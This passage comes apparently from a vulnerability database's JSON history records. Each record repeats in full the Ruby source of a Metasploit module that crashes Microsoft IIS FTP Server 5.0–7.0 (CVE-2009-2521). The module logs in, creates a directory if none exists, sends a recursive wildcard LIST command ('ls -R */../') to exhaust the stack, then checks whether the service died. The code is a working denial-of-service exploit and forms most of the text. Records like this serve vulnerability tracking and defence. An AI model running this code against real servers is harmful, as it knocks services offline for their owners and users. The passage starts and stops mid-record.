write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2017-10-22T19:40:39", "history": [], "viewCount": 23, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2017-10-22T19:40:39", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2017-10-30T01:43:47", "history": [], "viewCount": 23, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2017-10-30T01:43:47", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2017-10-30T03:40:55", "history": [], "viewCount": 23, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2017-10-30T03:40:55", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2017-10-31T03:41:05", "history": [], "viewCount": 23, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2017-10-31T03:41:05", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2017-10-31T07:40:17", "history": [], "viewCount": 25, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2017-10-31T07:40:17", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2017-11-20T20:06:43", "history": [], "viewCount": 25, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2017-11-20T20:06:43", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2017-11-20T22:18:47", "history": [], "viewCount": 27, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory 